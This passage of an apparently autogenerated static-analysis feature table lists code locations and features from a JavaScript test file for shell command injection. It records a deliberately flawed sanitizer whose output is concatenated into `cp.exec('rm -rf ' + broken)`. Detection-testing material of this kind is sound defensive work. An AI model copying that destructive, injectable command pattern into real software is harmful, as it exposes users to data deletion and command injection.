name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:40:181:45 | "'\\''" | receiverName | name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:50:181:52 | "'" | stringConcatenatedWith | ''' + name.replace() -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:3 | cp | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:3 | cp | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:8 | cp.exec | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:8 | cp.exec | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | exceptional return of cp.exec ... broken) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | exceptional return of cp.exec ... broken) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | exceptional return of cp.exec ... broken) | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | exceptional return of cp.exec ... broken) | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | exceptional return of cp.exec ... broken) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:5:182:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:5:182:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:5:182:8 | exec | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:5:182:8 | exec | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:5:182:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:18 | "rm -rf " | stringConcatenatedWith | -endpoint- broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:10:182:27 | "rm -rf " + broken | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:22:182:27 | broken | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:8 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:8 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path = ... "path") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path = ... "path") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:5:185:26 | path = ... "path") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:18 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:18 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | exceptional return of require("path") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | exceptional return of require("path") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | exceptional return of require("path") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | require("path") | contextFunctionInterfaces | 